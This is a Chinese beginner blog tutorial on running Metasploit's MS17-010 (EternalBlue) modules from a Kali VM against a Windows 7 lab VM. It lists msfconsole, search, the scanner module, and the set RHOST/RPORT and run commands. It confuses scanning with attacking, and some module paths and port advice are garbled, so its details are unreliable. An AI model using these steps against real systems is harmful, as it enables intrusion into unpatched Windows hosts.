在前面两期文章中,我们学习了如何使用MSF工具实现Windows远程控制https://blog.csdn.net/2301_79704866/article/details/136142270?app_version=6.2.8&csdn_share_tail=%7B%22type%22%3A%22blog%22%2C%22rType%22%3A%22article%22%2C%22rId%22%3A%22136142270%22%2C%22source%22%3A%222301_79704866%22%7D&utm_source=app以及后期渗透
https://blog.csdn.net/2301_79704866/article/details/136177320?app_version=6.2.8&csdn_share_tail=%7B%22type%22%3A%22blog%22%2C%22rType%22%3A%22article%22%2C%22rId%22%3A%22136177320%22%2C%22source%22%3A%222301_79704866%22%7D&utm_source=app 这使许多同学认为MSF就只是一个后门生成器。其实不然,今天我们就来学习MSF的另一个功能——鼎鼎大名的永恒之蓝漏洞攻击。建议小白收藏。
首先,准备好要用的工具。
1.Kali Linux2023.4版本虚拟机(攻击机)
2.Windows7虚拟机(靶机)
正式开始
1.以root形式打开Kali命令提示符
2.输入命令:
msfconsole
启动MSF程序。
3.众所周知,MSF的攻击模块高达近2000种,所以这里我们使用如下命令找到我们要用的永恒之蓝漏洞
search ms17_010
其中auxil iary/ scanner/ smb/ smb/ms17010为扫描模块,用于对目标是否存在永恒之蓝漏洞进行确认
exploit /wi ndows/ smb/ms17 010 eternalblue为攻击模块,用于对存在永恒之蓝漏洞的目标进行攻击
4.使用
use auxiliary/scanner/smb/smb_ms17_010
命令进行分析。
5.使用命令
show options
查看配置。这时候只用更改两个攻击配置。
分别为RHOSTS和RPORT其中RHOST是靶机的IP地址,RPORT是要攻击的端口。如果不确定靶机开了哪些端口,可以在靶机上使用
netstat -an
命令查看开放端口。
6.接下来更改这两个配置。
set RHOST (目标IP地址)
set RPORT (目标主机的开放且未被占用的端口)
7.输入
run
运行。
8.一般来说会显示
说明完成了攻击但未建立攻击会话。
好啦,今天的教程就到这里啦。如果有同学想要知道如果攻击成功应该怎么做请在评论区评论“666”。如果点赞破10出教程。感谢在座各位大佬的支持!本人初中生纯Linux小白,还请大佬们指导(恳求